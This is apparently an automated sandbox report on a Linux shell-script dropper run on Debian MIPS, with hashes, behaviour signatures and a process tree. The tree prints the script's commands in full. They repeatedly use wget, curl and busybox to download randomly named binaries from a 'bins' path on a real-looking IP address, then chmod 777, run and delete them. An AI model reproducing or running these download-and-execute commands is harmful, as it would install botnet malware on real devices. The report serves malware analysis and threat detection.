Analysis
-
max time kernel
62s -
max time network
63s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240729-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
25/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh
-
Size
10KB
-
MD5
1842c293913809baf3b70d2c7616a370
-
SHA1
cfb8715dfc9477769e6a4c913ce8cbf32a7c3c8a
-
SHA256
402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb
-
SHA512
92c3faac1ab3b27d8d710a5629244e1de0b8ab965ed2978664b2406ff672998852b8986d72545fd5fca7e8d62f60bad51a06e90e9472642e8b22934f3ad80be5
-
SSDEEP
96:d6uPCaTjHLgukFYocSxdkV1aNhc0r0/gulc3/m6uPCalNPHXw8BbqSxdkV1PGNhv:JrgukGocSxdkV1x81u3BxdkV16
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 879 chmod 975 chmod 839 chmod 891 chmod 909 chmod 957 chmod 969 chmod 810 chmod 885 chmod 915 chmod 939 chmod 903 chmod 921 chmod 822 chmod 897 chmod 951 chmod 963 chmod 770 chmod 981 chmod 993 chmod 987 chmod 861 chmod 870 chmod 927 chmod 933 chmod 752 chmod 759 chmod 945 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO 753 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy 760 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt 771 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM 812 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 823 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn 840 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK 863 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq 871 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 880 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI 886 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw 892 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 898 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj 904 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 910 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 916 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj 922 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM 928 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 934 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn 940 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO 946 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy 952 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt 958 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq 964 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK 970 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 976 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 982 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI 988 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw 994 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 908 busybox 911 rm 912 wget 913 curl 916 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 906 wget 907 curl 910 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz 914 busybox 917 rm -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy curl File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt curl File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq curl File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK curl File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw curl File opened for modification /tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK curl File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj curl File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM curl File opened for modification /tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq curl File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz curl File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO curl File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 curl File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn curl File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 curl File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI curl File opened for modification /tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz curl File opened for modification /tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj curl File opened for modification /tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy curl File opened for modification /tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2 curl File opened for modification /tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI curl File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 curl File opened for modification /tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt curl File opened for modification /tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM curl File opened for modification /tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw curl File opened for modification /tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4 curl File opened for modification /tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn curl File opened for modification /tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2 curl File opened for modification /tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO curl
Processes
-
/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh/tmp/402e66b3e2faed23ffb7e204f5124182b7d88aefafaee1cabd25d2e1753ca7bb.sh1⤵PID:723
-
/bin/rm/bin/rm bins.sh2⤵PID:727
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:730
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:750
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Executes dropped EXE
PID:753
-
-
/bin/rmrm DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:754
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:756
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:757
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:758
-
-
/bin/chmodchmod 777 jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy./jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm jGQ16cSNKIoHKKRwFStFoNXLqHH0WSyoXy2⤵PID:761
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:762
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:763
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:767
-
-
/bin/chmodchmod 777 Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt./Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵
- Executes dropped EXE
PID:771
-
-
/bin/rmrm Xah1oRVK1pi1CaLRnTRcSsHGrvBoFaevKt2⤵PID:774
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:806
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:812
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:820
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:821
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:822
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:823
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:824
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:825
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:836
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:840
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:850
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:858
-
-
/bin/chmodchmod 777 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK./5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm 5ApMM8W9aZrkPX4RCrEZvqF3Y5fnSOr3JK2⤵PID:866
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:867
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:868
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:869
-
-
/bin/chmodchmod 777 Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- File and Directory Permissions Modification
PID:870
-
-
/tmp/Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq./Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵
- Executes dropped EXE
PID:871
-
-
/bin/rmrm Rh8p49sVEsLTpHwQYtNLb0QsA4M8Uc3zLq2⤵PID:872
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:873
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:874
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:878
-
-
/bin/chmodchmod 777 BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge2./BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm BbBRR2VPs8EUoJaffCtKwEkn37dKGG2ge22⤵PID:881
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:882
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:884
-
-
/bin/chmodchmod 777 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- File and Directory Permissions Modification
PID:885
-
-
/tmp/3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI./3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵
- Executes dropped EXE
PID:886
-
-
/bin/rmrm 3UHjdryKDCd16kAcEN19g7mjh6TI9aTXkI2⤵PID:887
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:888
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:890
-
-
/bin/chmodchmod 777 F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw./F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵
- Executes dropped EXE
PID:892
-
-
/bin/rmrm F3v09e54svLrZUG8oB90EhdmnLAe6f5vAw2⤵PID:893
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:894
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:895
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:896
-
-
/bin/chmodchmod 777 RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- File and Directory Permissions Modification
PID:897
-
-
/tmp/RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr4./RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵
- Executes dropped EXE
PID:898
-
-
/bin/rmrm RzXiiIgCpHJtWAh79lK8lhNJLhS36PYOr42⤵PID:899
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:900
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:901
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:902
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:903
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:904
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:905
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:906
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:907
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:908
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:909
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:910
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:912
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:913
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:914
-
-
/bin/chmodchmod 777 hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- File and Directory Permissions Modification
PID:915
-
-
/tmp/hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz./hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:916
-
-
/bin/rmrm hc6fVOez4o3dbLKFVRY5pPwh254WNSkIpz2⤵
- System Network Configuration Discovery
PID:917
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:918
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:919
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:920
-
-
/bin/chmodchmod 777 HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj./HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm HWA6XEfX6Q1LP8LKNDjOWgt01DikxpYwSj2⤵PID:923
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:924
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:926
-
-
/bin/chmodchmod 777 aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- File and Directory Permissions Modification
PID:927
-
-
/tmp/aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM./aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵
- Executes dropped EXE
PID:928
-
-
/bin/rmrm aBW1RdkWBaQbMIGrL5LwNfcsrEwLgTgvxM2⤵PID:929
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:930
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Reads runtime system information
- Writes file to tmp directory
PID:931
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:932
-
-
/bin/chmodchmod 777 Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ2./Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm Zx7Hy7g5Hm2Zi7xRpkHm5FAsUc3uwrpaZ22⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:936
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:938
-
-
/bin/chmodchmod 777 KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn./KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm KUTJB9B1gU2Y5zr4p4gIKezefa9G3vvaWn2⤵PID:941
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵PID:944
-
-
/bin/chmodchmod 777 DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO./DEW3R9LPNexQA5nUGLI08Ux0tBK5mXOYcO2⤵
